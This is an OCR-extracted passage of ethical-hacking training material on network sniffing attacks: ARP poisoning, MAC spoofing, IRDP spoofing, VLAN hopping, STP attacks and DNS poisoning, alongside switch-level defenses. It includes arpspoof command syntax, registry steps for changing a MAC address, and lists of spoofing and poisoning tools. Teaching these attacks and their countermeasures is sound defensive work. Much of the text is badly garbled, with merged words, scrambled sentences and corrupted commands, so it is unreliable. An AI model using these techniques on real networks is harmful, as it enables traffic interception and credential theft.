packet i n the targetARPcache i n this process.
As the ARPreplyhasbeen
forged,
the destinationcomputer (target)
sendsframesto the attacker'scomputer,wherethe
attackercan modify
the framesbeforesending them to the source machine(UserA)i n an
MITM attack.Theattackercan alsolauncha DoSattackbyassociating a non-existent MAC
address
to the IP addressof the gateway; alternatively,
the attackermay sniffthe traffic
passively
andthenforwardit to the targetdestination,
ARPcache
Poisoned
Sa Sere
Gaarmeacre scutes
ers | sotes
Switch
cones @ seraeromated
$ latimetewer
nto
GEES)
te
c
sre Attacker
Figure834:Working
of an ARPspoofing
attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
Threatsof
ARP
Poisoning
(©
Using
fake divert
exchanged
trafficbeing all between
ARPmessages,
two
machines,
an atacker
via in
can
theatacke’s
PC
communications resultingall
VoIPcallTapping Resetting
Connection
‘Manipulating
Data Stealing
Passwords
‘Man-in-the-Midde
Attack Service(Dos)
Denial-of Attack
ARP
‘Threats
of
Poisoning
With the helpof ARP poisoning, an attacker can use fake ARPmessagesto divert all
communicationsbetweentwo machines so thatalltrafficredirectsvia theattacker's
PC
‘The poisoning
threatsof ARP
Packet
Sniffs
traffic apart
Sniffing:
of
include:
over a networkor the network,
SessionHijacking:
Stealsvalid session informationand uses it to gain unauthorized
toaapplication
n
access
VoIP Call Tapping: Usesport mirroring,which allowsthe VoIP call tappingunit to
monitor all networktraffic,
andpicksonlythe VoIPtrafficto recordbyMACaddress.
‘Manipulating
Data:ARPspoofing
allowsattackers andmodify
to capture data,or stops
the flowof traffic.
Attack: An attackerperforms
‘Man-in-the-Middle a MITM attackwhere theyreside
betweenthevictim andserver:
DataInterception: IPaddresses,
intercepts MACaddresses,
andVLANsconnectedto the
switchi n a network,
ConnectionHijacking:In a network,thehardware are supposed
addresses to beunique
and fixed,but 2 hostmaymove whenits hostnamechangesand use anotherprotocol
In connection hijacking,an attacker can manipulate
a client's connection to take
complete control
ConnectionResetting:
The wrong routinginformationcouldbe transmitteddue to a
hardware/software
to
error. In suchcases,if a hostfails initiate a connection,
that host
ical andCountermensores
Mackin ©by E-Comel
Copyright
shouldinformtheAddress Resolutionmoduleto deleteits information.Thereceptionof
datafromthat hostwill reset a connection timeout i n the ARPentryusedto transmit
datato thathost.Thisentryin the ARPmoduleis deletedif thehostdoesnot sendany
Stealing
for
a
information
Passwords:
of
certain periodtime.
An attackeruses forged
ARP replies
and trickstargethostsinto
sending
sensitive informationsuchas usernamesandpasswords.
DoSAttack:Linksmultiple with a single
IP addresses MACaddressof the targethost
that is intended
fordifferentIP addresses, with a huge
whichwill beoverloaded amount
of traffic,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Tools
ARP Poisoning
ARPPoisoning
Tools
+
arpspoof
Source:https://linux.die.net
arpspoof packets
redirects from a targethost(orall hosts)
on the LAN intended
for
anotherhoston the LANbyforging
ARPreplies.
Thisis an extremely
effectiveway of
sniffing
trafficon a switch.
Syntax:
arpspoof- i [Interface] -t [TargetHost]
shownin the screenshot,
‘As attackersu se the arpspooftool to obtainthe ARPcache;
then, the MACaddressis replaced with that of an attacker'ssystem. Therefore,
any
trafficflowing
from the victim to the gatewaywill be redirected to the attacker's
system.
Further,
an attackercan issue the same commandi n reverse as he/she
is i n the middle
andcan sendARPreplies
in bothdirections.
ical andCountermensores
Mackin ©by E-Comel
Copyright
the of
stacers
laced
witht
tem
Someexamples
of
Figure35:Screenshotrppoot
of ARPpoisoning toolsare listedbelow.
+
BetterCAP(https://www.bettercap.org)
+
(hitp://www.ettercap-project.ora)
Ettercap
dsr (https://www.monkey.org)
MITME(https://github.com)
(https://sourceforge.net)
Arpoison
Module
8 1122
Page ical andCountermensores
Mackin
©
Copyright
by E-Comel
How to DefendAgainst
ARP Poisoning
Implement
Dynamic
ARPInspection
Using
DHCPSnooping
Binding
Table
SS st
on
ag (ee See
How to DefendAgainst
Implementation of Dynamic
ARP
Poisoning
ARPInspection (DAI)prevents poisoning attacks.DAlis a security
featurethatvalidatesARPpacketsi n a network.WhenDA\ activates on a VLAN, o n the
all ports
VLANare consideredto be untrustedbydefault.DAIvalidatesthe ARPpackets using a DHCP
snoopingbinding table. The DHCP snoopingbinding table consistsof MAC addresses, IP
addresses,andVLANinterfacesacquired bylistening
to DHCP message exchanges. Hence,you
must enable DHCP snoopingbefore enabling DAI. Otherwise, establishinga connection
betweenVLANdevicesbasedon ARPis not possible. Consequently, a self-imposed DoSmay
resulton
any
device VLAN.in that
To validatethe ARP packet, the DAI performs IP-address-to-MAC-address binding inspection
storedi n the DHCPsnooping databasebefore forwarding the packetto its destination.If any
a address,
invalid IP address binds MAC
riskof MITMattacks.DAIensuresthe relay
the DAI will discardthe ARPpacket.
of onlyvalidARPrequests the
Thiseliminates
andresponses,
If the hostsystems in a networkhold static IPaddresses, DHCP snoopingwill not be possible, or
other switches in thenetwork cannot run dynamic ARPinspection. In suchsituations,you have
to perform
static
mapping
aanARPpoisoning an toa
attack. on
a
that associates IPaddress MACaddress VLANto prevent
8.36:Defending
Figure ARPpoisoning
against
ical andCountermensores
Mackin ©by E-Comel
Copyright
DHCPSnooping
Configuring and Dynamic
ARPInspection
on CiscoSwitches
Configuring
‘Assnooping
discussed,
ARP
DHCPSnooping
DHCP
andDynamic Inspection
snooping
on CiscoSwitches
must beenabledbeforeenabling DAI.DHCP is a security
featurethat buildsand maintains a DHCPsnoopingbinding table andfilters untrustedDHCP
messages. ACiscoswitchwith DHCP snoopingenabledcan inspect
DHCP trafficflowat a layer2
segment andtrackIP addressesto switchportmapping,
To configure DHCPsnoopingon a Ciscoswitch,
ensure DHCP bothglobally
snoopingis enabled
andper access VLAN.ToenableDHCP snooping,execute the following
commands:
Configuring
Switch
DHCP snooping inglobal
configuration
(config)#ip dhep snooping
mode
Configuring
DHCPsnooping
for VLAN
a
Switch (config)# ip dhepsnooping vian 10
Switch (config) # “2
Toview the DHCP
snooping status
Switch show ip dhepsnooping
Switch DHCPsnooping is enabled
DHCPsnoopingis configuredon following VLANs: 10
DHCPsnooping is operational on following VLANs: 10
DHCPsnooping is configured on the following 13 Interfaces
ical andCountermensores
Mackin ©by E-Comel
Copyright
Iftheswitchis
functioning
only at layer
the layer2 interfacesto designate
switchthatDHCP responses
2,applythe ip dhep snooping trust command
for a VLAN
inspection
VLAN numbers.
10
Vian
10
°
Dest MAC Failures
°
°
IP Validation
°
°
Failures Invalid
°
Protocol
°
Data
ical andCountermensores
Mackin ©by E-Comel
Copyright
additionalvalidation checks.
To do so, execute the commandip arp inspection
validate followedbythe address
type.
Assumethat an attackerwith the source IP address 192.168.10.1connects to VLAN 10 on
interfaceFastEthernet0/S andsendsARPreplies, pretending to be the default router for the
subneti n an attemptto initiate an MITM attack.Theswitchwith DAI enabled inspects these
replypackets bycomparing
entryforthesource IP address
theswitchdiscards
them
thesepackets.
with
DHCP
snooping
the
switch table.The
o n portFastEthernet0/S.
192.168.10.1
thentries to find an
If thereis no entry,then
Enabled
ACL Logging
Active
DHCPLogging Probe Logging
30 ° ° °
Dest MAC Failures IP Validation Failures Invalid Protocol Data
Module
8 1127
Page ical andCountermensores
Mackin Copyright
©
by E-Comel
DetectionTools
ARP Spoofing
fovea
ARPSpoofing
DetectionTools
+
xarp
Source:http://www.
xarp.net
XArpis a securityapplicationthat detects ARP-based
attacks.
It detectscriticalnetwork
attacksthat firewallscannot cover. It uses advancedtechniquesto detectARPattacks
like ARP spoofing. The detection mechanismrelies on two techniques: inspection
modulesand discoverers.Inspection moduleslook at ARPpackets and checktheir
correctness and validityconcerningthe databasestheyhave built up. Discoverers
actively validate IP-MAC mappingsand actively detect attackers.The mechanism
detectsARPattacksand keeps data private.It even monitors wholesubnetsfor ARP
attacks.This application screens the wholesubnetfor ARPattacksusingdifferent
securitylevelsandfine-tuning A localnetworkthat is subject
possibilities. to ARPattacks
inspectseveryARPpacket andreports attacksagainst remote machines.
shownin the screenshot,
‘As professionals
security use XArp
to detectARPspoofing
attacksperformed
on the systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure8.37:
Screenshot
of Karp
Someexamples
of ARPspoofing
detectiontoolsare listedbelow:
=
Capsa (https://www.colasoft.com)
NetworkAnalyzer
=
(https://sourceforge.net)
ArpON
‘ARPAntiSpooter
(https://sourceforge.net)
(hitps://github.com)
ARPStraw
(https://aithub.com)
shARP
ical andCountermensores
Mackin ©by E-Comel
Copyright
MACSpoofing/Duplicating
a
SniffingTechnique:
__
Attacks
Spoofing
f__.
BesidesARPspoofing,an attacker can alsouse MACspoofing, IRDPspoofing, VLANhopping,
and STPattacksto sniff the traffic of a targetnetwork.This section describesspoofing
techniques
that helpattackersto stealsensitive information.
Thissection alsoexplains
how to
MACspoofing,
defendagainst VLANhopping, andSTPattacks.
MAC Spoofing/Duplicating
MAC duplicating
legitimate
refersto spoofing
the network.A MAC duplicating aMAC
address
withaddress
of user
on the MAC
attack involvessniffing
a legitimate
a networkfor MAC addresses
clientsconnectedto the network.In this attack,the attackerfirst retrieves the MAC
of
addresses of clientswho are actively associatedwith the switchport. Then, the attackerspoofs
a MACaddress with the MACaddress client.Ifthe spoofing
of the legitimate is successful,
then
the attackerc an receive all the trafficdestinedfor the client.Thus, an attackercan gain access
to the network andtakeover theidentity ofsomeoneon the network.
ical andCountermensores
Mackin ©by E-Comel
Copyright
showshowan attackerperforms
Thediagram a MACspoofing/duplicating
attack.
Figure 8.38:
MACpoofine/duoicating
attack
Note:Thistechnique
can beusedto bypass
wirelessa ccesspoints’
MACfiltering.
ical andCountermensores
Mackin ©by E-Comel
Copyright
MACSpoofing Windows
Technique:
start
InWindows fr Papel
1008
and
open
then ‘Chek ad search Control ase
{ype“ipconfig―
ort
confi in
romp
thecomma
vei the
8
Module Page1142 ical andCountermensores
Mackin Copyright
©
by E-Comel
In the EthernetProperties clickon the Configure
window, button andthen on the
Advancedtab.
Underthe “Property―
browsefor NetworkAddressandclickon it.
section,
Onthe right-hand
click
assignand
side,under“Value,―
OK.number
typei n the new MAC
address you wouldliketo
Note:
Type
Enter the MACaddress
“ipcontig/all―
config
or “net rdr―
without“:―
i n between,
[
eanek
Contre
Pcl GEFoy Propeties
Taearcedomer Oats Everts
to change
Method2: Steps
839: Ethernet
Figure dialog
Properties
the MACaddressi n the registry’
box
1. PressWin+ Rto openRun,andtyperegedit32 to start the registry
editor.
2. Note: Do not type Regeditto start the registry editor. Go to
"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class
Lce-bfe1-08002be10318} o n it to expand
anddouble-click the tree.
Four-digit
sub keysrepresenting
network adapters
will be found (starting
with 0000,
0002,etc.)
(0001,
ical andCountermensores
Mackin ©by E-Comel
Copyright
Searchfortheproper“DriverDesc―
keyto findthe desired
interface.
(data on
Right-clickthe appropriate
type"REG_S2―)
subkeyandaddthe new stringvalue“NetworkAddress―
to contain the new MACaddress.
fegistryEator
ical andCountermensores
Mackin ©by E-Comel
Copyright
MAC Tools
Spoofing
Mikeserene et
hades | ee
MAC Spoofing
Tools
TechnitiumMACAddressChanger
Source:https://technitium.com
Technitium Changer
MAC Address (TMAC)
allowsyou to change
(spoof)
the MAC
addressof your NICinstantly.
Every
NIChas @MACaddresshardcodedi n its circuit by
the manufacturer.Thishard-codedMAC addressis usedbyWindowsdriversto access
the Ethernet
the original network
(LAN).
hard-codedtoolThis can set a new MACaddressto your NIC,bypassing
MAC address.
shownin the screenshot,
‘As attackers c an use TMACto spoof theirMAC
or change
addressto perform
an attackon the targetsystem,
ical andCountermensores
Mackin ©by E-Comel
Copyright
[Technine
1D
MaudmateFCIVEN
D
Condig
10cm
(90521 9800
Urarwn Vand
MAC
‘Active Adtiest
et:
TOPAP Enaies TOPAPvE:
Erstled Unknown
Van
|
eee call
Figure841:Screenshotof TechntiumMACAddressChanger
(TMAC)
Someexamples
ofMACspoofing
toolsare listedbelow:
=
SMAC(http://www.klcconsulting.net)
(https://www.novirusthanks.org)
MACAddressChanger
Change (https://lizardsystems.com)
MACAddress
Easy Changer
Mac (https://github.com)
‘Spoof-Me-Now
(https://sourceforge.net)
IRDP Spoofing
1@c M RouterOscover ProtocolROP)
‘outers ther subnet IP of
thatallows host
protocol
i s routng dscoverthe adresses active
andwoltingmessageson thernetwork
bysteningtortor advertisement
Theattacker
3
sendsspoofed
defolt router whatevert heatacher choses the
ROProuteradvertisement
change
messageto hoston thesubnet,
causingto ts
This
tack allows theatacler os
racers an use
he
waffle and
nd collecvalableinformation
to lunchman-nthe-midle,
ROPspoofing ania servic,
fromhe packets
sitingtacks
passive
IRDPSpoofing
ICMPRouterDiscovery Protocol(IRDP) is a routing protocolthat allowsa hostto discoverthe IP
addresses of activerouters on its subnetbylistening to router advertisement andsolicitation
messages on its network.Theattackercan adddefaultroute entries on a system remotely by
spoofing router advertisement messages. As IRDP doesnot requireany authentication, the
targethostwill prefer the defaultroute definedbythe attackerover the defaultroute provided
bythe DHCPserver. Theattackeraccomplishes this bysettingthe preferencelevelandlifetime
of the route at high valuesto ensure that the targethostswill chooseit as the preferred route.
‘This
attacksucceeds if the attackerlaunching the attackis on the same networkas the victim.
In the case of a Windowssystem configured as a DHCP client,Windowschecksthe received
router advertisements for entries. If there is onlyone, then it checkswhetherthe IP source
addressi s withinthe subnet. Ifso,then it addsthedefaultroute entry;otherwise, it ignoresthe
advertisement,
gure
8.42:
ROP spoofing
ical andCountermensores
Mackin ©by E-Comel
Copyright
An attackercan use thisto sendspoofed router advertisement messages so that all thedata
packetstravelthrough the attacker’s
system.Thus,the attackerc an sniffthe trafficandcollect
valuableinformation fromthedata packets. Attackerscan use IRDPspoofing to launch MITM,
oS, andpassivesniffing attacks.
‘=
a
PassiveSniffing:In switchednetwork,the attacker
outboundtrafficof targethoststhrough spoofs
IRDPtraffic to re-route the
the attacker'smachine.
MITM: Oncesniffingstarts,the attackeracts as a proxy betweenthe victim and the
Theattackerplays
destination. an MITM roleandtries to modifythetraffic.
DoS:IRDPspoofing
allowsremote attackersto addwrongroute entries into thevictim's
routing
table.address
Prevent IRDPspoofing
The wrong
attacksbydisabling
entrycauses DoS.
IRDPon hosts,
ifthe OSpermits
it
ical andCountermensores
Mackin ©by E-Comel
Copyright
VLAN Hopping
LAN hopping
stacksota sete infra such
x
psa, modi erupt ar dl e dat,
‘VLAN
Hopping
Virtual local area network (VLAN) hopping is a techniqueused to targetnetwork resources
present on a VLAN.Themain purposebehind a VLAN hopping attackis to gain accessto the
traffic flowing i n other VLANspresent in the same network, whichis otherwiseinaccessible.
Networksusually havepoor VLAN implementation or havemisconfigurations that allow
attackersto perform this typeof attack.Attackersperform VLANhopping attacksto steal
sensitive informationsuchas passwords; modify, or deletedata;
corrupt, installmaliciouscodes
or programs; or spread viruses,Trojans,
andworms throughout thenetwork,
VLANhopping attackscan be performed via two primary methods, as given below:
=
SwitchSpoofing
switchspoofing,
Using the attacker
connectsa rogueswitch bytricking
into thenetwork
a legitimate switchandthereby creating a trunklinkbetweenthem.After establishinga
multiple
trunk link,the trafficfrom VLANscan be sent to and through
the rogueswitch,
therefore allowing an attackerto sniff and view the packetcontent. Thisattack is
successfulonlywhen the legitimate switch is configured
to negotiatea trunk
connection,or when the interfaceis configured auto,―
with “dynamic “dynamic
desirable,―
or “trunk―
mode.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Rogue(eee
Sunch
DoubleTagging
&
=
HD
Servers Server?
switch1
——. ‘switch
2
stack
van
ED&
Server
Figure
8.4: lusrationofdouble
tating
ical andCountermensores
Mackin ©by E-Comel
Copyright
STPAttack
STPAttack
In a Spanning TreeProtocol(STP) attack,attackersconnect a rogue switchinto the networkto
change the operation ofthe STPprotocol andsniffall thenetworktraffic.STPis usedi n LAN
switchednetworkswith the primaryfunctionof removingpotential loops within the network.
STPensures thatthetrafficinsidethenetworkfollowsa n optimized pathto enhancenetwork
performance. a switchinsidethe networkis appointed
In this process, as the root bridge.After
the selectionof the root bridge,otherswitchesi n the networkconnect to it byselecting a root,
port to
(theclosestport the root bridge).
Theroot bridgeis selectedwith the helpof BridgeProtocolDataUnits(BPDUs).
BPDUseach
numberknownas a BID or ID. TheseBIDsconsistof the Bridge
havean identification Priority
andthe MACaddress.Bydefault, thevalueof the Bridge
Priority
is 32769.
ical andCountermensores
Mackin ©by E-Comel
Copyright
cow
=
Switch2
erty 32769 server
Priority
rogueSwitch
Tt
oon
Switch?
attacker
Figure8.45:
lustrationofanSTP
attack
Modul
8 1152
Page ical andCountermensores
Mackin
©by E-Comel
Copyright
How to DefendAgainst
MACSpoofing
DHCPSnooping
‘Use
Binding
ARP Dynamic Inspection,
Table, andIPSource
Guard
“ae
Bee
_———
How to DefendAgainst MAC Spoofing
Performingsecurityassessmentsis the primary ai m of a n ethicalhacker.An ethicalhacker
attacksa target networkor organization with the knowledge and authorizationof its
management, to find loopholes architecture.However,
i n the security the jobdoes not end
there.Finding
thoseloopholes is a minor task.The most crucial taskof ethicalhackingis to
applythe appropriate
countermeasuresto security loopholes to fix them,
Onceyou havetestedthe networkfor MACspoofing attacksandcollectedsecurity loopholes,
you shouldapply countermeasuresto protectthenetworkfromfurtherMACspoofing. Many
MACspoofing
countermeasurescan beapplied
to specific andloopholes.
networkarchitectures
Apply theappropriate
countermeasuresto your network.
TodetectMACspoofing, to knowallthe MACaddresses
it is necessary in the network.Thebest
way to defendagainstMAC addressspoofing is to place
the server behindthe router. Thisis
because routers depend
onlyon IPaddresses,whereasswitchesdepend on MACaddresses for
communication in a network.Making changesto the portsecurity interfaceconfiguration
is
anotherwayto preventMACspoofing attacks.Onceyou enable the port-security
command, it
allowsyou to specify the MACaddressof the systemconnectedto the specific port.It also
allowsforspecific
action to be takenif a portsecurity
violationoccurs.
You can alsoimplement
the following to defendagainstMACaddressspoofing
techniques
attacks:
+
DHCP SnoopingBinding Table: The DHCP snoopingprocess filters untrusted DHCP
address,and
messageshelps
to correspond
to buildandbind a DHCP
leasetime,binding
IP address,
bindingtable,
type,VLAN number, This the
tablecontains MAC
andinterfaceinformation
with untrustedinterfacesof a switch,It acts as a firewall between
ical andCountermensores
Mackin ©by E-Comel
Copyright
untrustedhostsandDHCPservers. It also helps
i n differentiating
betweentrustedand
untrustedinterfaces.
Dynamic Thesystemchecksthe IP-MAC addressbinding
ARPInspection: for eachARP
packet a DAl,the system
in a network.While performing will automatically
dropinvalid
bindings.
IP-MAC address
IP SourceGuard:IPSourceGuardis a security featurei n switches
that restricts the IP
trafficon untrustedlayer
2 portsbyfiltering
trafficbasedo n the DHCPsnooping binding
database. spoofing
It prevents attackswhenthe attackertries to spoofor use the IP
of host,
address another
Encryption:
Encrypt
the communication betweenthe access pointand computerto
preventMACspoofing.
Retrievalof MACAddress:Youshouldalways retrieve the MACaddressfromthe NIC
directly
insteadof retrieving
it fromthe OS.
Implementation Thisis a typeofnetworkprotocol
of IEEE802.1XSuites: for port-based
NetworkAccess Control(PNAC), andits main purposeis to enforceaccesscontrolat the
pointwherea user joinsthe network.
(Authentication,
‘AAA andAccounting):
Authorization, Use an AAA (Authentication,
Authorization,
andAccounting)
server mechanism
to filter MACaddresses subsequently
846:
Figure Defending MACspoofing
against
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
VLAN
Hopping
SwitchSpoofing
Dofendagainst DoubleTagging
Dofendagainst
configure
©Exley
ports
access
ports that
each
access
the
with
1)
andensre thatallaccess ports
as “a:
Ensure
VIAN exeptthedefalt AN
portsassigned
(VLAN
native
VLANs
configured unused
ports
are
“©
Enaurethathe oo al run
swiechportmoda nonagotia changeto an VLAN 1D:
Ensure
ports
tha allrunk are itchport trunk native vlan 999
switch
ae
awitenportnode
(contig-16)Â¥ ports expt tagged
switch
(config-if)# awitchpartmode
How to Defend
DefendAgainst
VLAN
Against Hopping
SwitchSpoofing
Performthe followingsteps to configure
a switchto preventswitchspoofing
attacks:
‘=
Explicitly
configure the portsas access ports,andensure that all access portsare
configured trunks:
not to negotiate
switchport mode access
switchportmode nonegotiate
Ensurethat all trunkportsare configured trunks:
not to negotiate
switchportmode trunk
switchportmode nonegotiate
DefendAgainst
DoubleTagging
thefollowing
Perform stepsto configure
a switch doubletagging
to prevent attacks:
=
withVLANexceptthe defaultVLAN(VLAN
Ensurethateachaccessportis assigned 1):
switchport access vlan 2
Ensure
that
native
VLANs
on
all are
the
switchport trunk ID:
native vlan
trunkports changed
999
to an unused
VLAN
Ensure
vlan
that
native
VLANs
on
all are
the
dotigqtag
explicitly
tagged:
native
trunkports
ical andCountermensores
Mackin ©by E-Comel
Copyright
How to DefendAgainst
STPAttacks
T oprevent
an
STP
attack,thefolowing
BPDUGuard
features
security must beImplemented
LoopGuard
{©Toenabie
the BPOU
guard
onalPortfast
edge Toenable
theloopguard
on a in
the
ear
Root
‘Tosnableroot
Guard
feature on an
‘UDED
(Unidirectional
onLink
UDLODetection)
1@T oenable an interface
interac:
sntartace
gigabiteatharaet slot/port
configure terminal
How to DefendAgainst
STPAttacks
Implement
the following
countermeasuresto defendagainst
STPattackson switches:
©
BPDU Guard:BPDUguard must be enabledon the portsthat shouldnever receive a
BPDUfromtheir connecteddevices.Thisis usedto avoidthe transmissionof BPDUs
on
PortFast-enabled Thisfeaturehelps
ports. i n preventing bridging
potential loops i n the
network.If BPDUguard i s enabled o n a switchinterface andan unauthorizedswitch
connectsto it, the portwill be set to errdisablemodewhen a BPDUis received.The
errdisable
modeshutsdown the port and disables i t fromsending or receivingany
traffic
Usethe following to enableBPDUguard
commands on a switchinterface:
configure terminal
interface gigabiteethernet slot/port
spanning-tree portfast bpduguard
Root
in Guard:
ports)
protectsensures
Rootguard
the STPtopology.
nearby
to prevent the
as
thetheroot bridge
and
It forcesthe interfacesto becomethe designated
switches frombecoming root switches.
thatit remains
ports(forwarding
Therefore, if aport
root
enabledwith the root guard featurereceives a superior BPDU, it converts that portinto
a loop inconsistentstate (not thusprotecting
errdisabled), an STP topology change. This
portremains inactive onlyfor that specific switch/switchesattemptingto change the
STPtopology. Thisportremains i n downstate untiltheissueis resolved.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Usethefollowing to enable
commands featureon a switchinterface:
the root guard
configure terminal
interface gigabiteethernetslot/port
spanning-tree guard root
LoopGuard:Loopguard improves the stability
of the networkbypreventingit against
thebridging
loops.
It is generally
usedto protectagainsta malfunctioned
switch,
Usethe following to enablethe loop
commands guard
featureon a switchinterface:
configure terminal
interface gigabiteethernetslot/port
spanning-tree guardloop
UDLD (Unidirectional
unidirectional
Link Detection):
linksand further disablethe affected
unidirectionallinksi n the networkcan cause
to
UDLD enablesdevices detectthe existenceof
interfacesi n the network.These
STPtopology
loops.
Use command
following
the
toenable
on
a
configure terminal
UDLD switchinterface:
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSPoisoning
Techniques
|@ DNSposoningis
technique
titties
aDNS
server
| fora
target adares
givenentries
server
Into beleing that haereceiveda utent information
allows the attackert o
site ona
paceIP
ONS withtheI P
DASlevel
numeric address
ofa
(©eresuts inthesubstitution
to
thatconten)
wth
fle I addres at the
target
server,
where thewebaddressesare converted
into
Theatacerc an
ene
"ima
rate fakeONSentries forthe
(entiningmalicious
ofthe
names
e ns erat
DNSPoisoning
SniffingTechnique:
Thissection describesDNSpoisoningtechniques to sniffthe DNStrafficof a targetnetwork.
Usingthistechnique, an attackercan obtainthe IDof the DNSrequestbysniffing andcan send
reply
a malicious to the senderbefore theactualDNSserver responds.
DNS Poisoning Techniques
DNSis the protocol
that translatesa domainname (e.g.,
www.eccouncil.org)into an IP address
(e.g., Theprotocol
208.66.172.56). uses DNStablesthat contain the domainname and its
equivalent
IP addressstoredi n a distributedlarge
database.In ONSpoisoning,alsoknownas
DNSspoofing, the attackertricksa DNSserver into believing that it hasreceivedauthentic
informationwhen, in reality,
it hasnot receivedany.Theattackertries to redirectthe victim to
a maliciousserver insteadof the legitimateserver. Theattackerdoesthis bymanipulating the
IPof
DNStable entries in the DNS.Thisresultsi n substitution a falseIP addressat the ONSlevel,
are
wherewebaddresses converted into numeric addresses.
Whenthe victim tries to accessa website, theattackermanipulates the entries in theDNStable
so
that systemredirectsthe URLto the attacker'sserver. Theattackerreplaces
the victim’s
addressentries for a targetsite on a given DNSserver with the IP address the server
(malicious server) he/shecontrols.Theattackercan create fake ONSentries for the server
IP
of
(containing maliciouscontent) with the same names as thatof the targetserver. Thus, the
victim connectsto the attacker'sserver without realizing it. Oncethe victim connectsto the
attacker'sserver, the attacker
can compromise the victim'ssystem andstealdata,
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSpoisoningis possible
usingthe following
techniques:
=
Internet
DNS
Intranet Spoofing
ONS Spoofing
Proxy Server DNSPoisoning
=
DNSCache Poisoning
ical andCountermensores
Mackin ©by E-Comel
Copyright
IntranetDNSSpoofing
1Gfothsteenique,
12 It vrk
theatacke’
system
wellagantstehes
mustbe connected
ae
Intranet DNSSpoofing
attackercan perform
‘An an intranet DNSspoofing
attacko n a switchedLANwith the helpof
the ARPpoisoningtechnique. To performthisattack,
the attackermustbeconnected to the
LANandbeableto sniffthetrafficor packets. Anattackerwhosucceeds in sniffing
the IDof the
DNSrequest from the intranet can senda malicious
replyto the senderbeforethe actualONS
server.
Thediagram how an attackerperforms
describes an intranet DNSspoofing.
In the diagram,
Figure8.47:
DNS
Intranet spoofing
the attackerpoisonsthe router byrunningarpspoof/dnsspoof to redirectONS
requests of clientsto the attacker’s
machine. Whena client(John) sendsa DNSrequestto the
router, the poisoned router sendsthe DNSrequest packet to the attacker'smachine.Upon
ical andCountermensores
Mackin ©by E-Comel
Copyright
the attackersendsa fakeDNSresponse
receivingthe DNSrequest, that redirectsthe clientto a
fake websiteset up bythe attacker.The attackerowns the websiteand can see all the
information submitted
such as passwords,
information
can
bytheclientto thatwebsite.Thus,the attacker sniffsensitive data,
submittedto the fake website.The attacker retrieves the required
andthen redirects
theclientto therealwebsite.
ical andCountermensores
Mackin ©by E-Comel
Copyright
InternetDNSSpoofing
to
that
ONSSpoofing,
|@ ‘Internet the atacer
ofthe attacker’ infects
John's
machine changes
with aTojanand hisONSIPaddress
Internet DNSSpoofing
Internet DNSpoisoning is alsoknownas remote ONSpoisoning. Attackerscan perform ONS
spoofing attackso n a single
victim or on multiple
victims anywherei n the world.To perform
thisattack,
a DNS
Attackersperform
with
a IP
theattackersetsup rogue server
Internet DNSspoofing
static address.
with the helpof Trojanswhenthe victim’s
system
to
the changes
connects Internet.Thisis an MITM attackin whichtheattacker
entries of the victim’s Theattackerreplaces
computer.
IP addressthat resolvesto the attacker'ssystem.
the victim’s
Thus,
theprimaryONS
DNSIPaddresswith a fake
the victim’s
trafficredirects
to the
attacker'ssystem.At this point,the attacker can easilysniff the victim’sconfidential
information.
Thefigure
illustratesan attackerperforming
InternetDNSspoofing. Theattackerinfects
John’s
machinewith a Trojanandchanges hisDNSIP address
to that of theattacker.
ical andCountermensores
Mackin ©by E-Comel
Copyright
ProxyServerDNSPoisoning
‘thatthe
aackersandrdivects
othe fakewebsite
omnes x
ServerDNSPoisoning
Proxy
In the proxy server DNSpoisoning technique,
the attackersets up 2 proxy server on the
attacker's system.Theattackeralsoconfigures
a fraudulent DNSandmakesi ts IP address a
primaryDNSentryin the proxyserver. Theattackerchanges the proxyserver settings
of the
Theproxyserves as a primaryDNSand redirects
victim with the helpof a Trojan. the victim's
traffic to the fake website,wherethe attackercan sniff the confidentialinformationof the
victim andthen redirectthe requestto the realwebsite.
As shownin the figure, an attackersendsa Trojan machinethat changes
to John’s his proxy
i n InternetExplorer
server settings to thoseof the attacker,
andredirectsthe request
to a fake
website
8.49:
Figure server ONS
Prony p oisoning
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSCachePoisoning
“a
DAScache
forged
refers
poisoning
avery redvectedtoa
or adn
to altering
malcous
ONS
records
nto the ONS
resolver
cache that DNS
|G Ifthe
ONS ONS
responses
reser
have
been
reeled
canna validate
thatthe froman authoritative sore,
o ok
DNSCachePoisoning
DNScachepoisoning refersto altering or adding forged DNSrecordsi n the DNSresolvercache
so that a DNSquery is redirected to a malicious site. TheDNSsystem uses cache
memoryto
holdthe recently resolveddomainnames.Theattackerpopulates it with recentlyuseddomain
names and their respectiveIP address entries.When a user requestis received, the ONS
resolverfirst checksthe DNScache; if the systemfinds the domain name that the user
requested i n the cache,the resolverwill quickly
sendits respectiveIP address. Thus,
it reduces
thetrafficandtime of DNSresolving.
targetandmakechanges
‘Attackers or addentries to thisDNScache. If the ONSresolvercannot
validatethatthe DNSresponseshavecome froman authoritative source, it will cache
the
incorrect entries locallyand serve them to users who makethe same request. Theattacker
replaces the user-requested IP address with the fakeIP addressand,whenthe user requests
that domainname, the DNSresolverchecksthe entryi n the DNScacheand picks the matched
(poised)entry. Then,it redirectsthe victim to the attacker's
fakeserver insteadof the intended
server.
ical andCountermensores
Mackin ©by E-Comel
Copyright
DNSPoisoning
Tools
DorpNspoot theONS a
DerpXSpooisONSposorngoo tha asin
| spoaing querypacket
edress grup
ora ofows
of etn
inthe network
Seiad
DNSPoisoning
Tools
DNSpoisoning toolsallowattackersto redirecta domainname to a differentIPaddresslistedi n
a fakeDNSentryfile.TheDNSrequest madeto thetarget sitegoesthrough a server containing
malicious
content with the samename.
=
DerpNSpoof
Source:https://github.com
DerpNSpoof is a DNSpoisoningtool that assistsin spoofing
the DNSquery packet
of a
certain IP address or a groupof hostsi n thenetwork.
Usingthistool,attackers
a
can create list offakeDNSrecords
thetool to redirectthe victim to some otherwebsite,
andloadit whilerunning
Module
8 1167
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
Someexamples
851:are
Figure Screenshotof DerpNSpoof
of additionalDNSpoisoningtools
tol
listedbelow:
DNS Spoof
(https://aithub.com)
=
(https://github.com)
DNS-poison
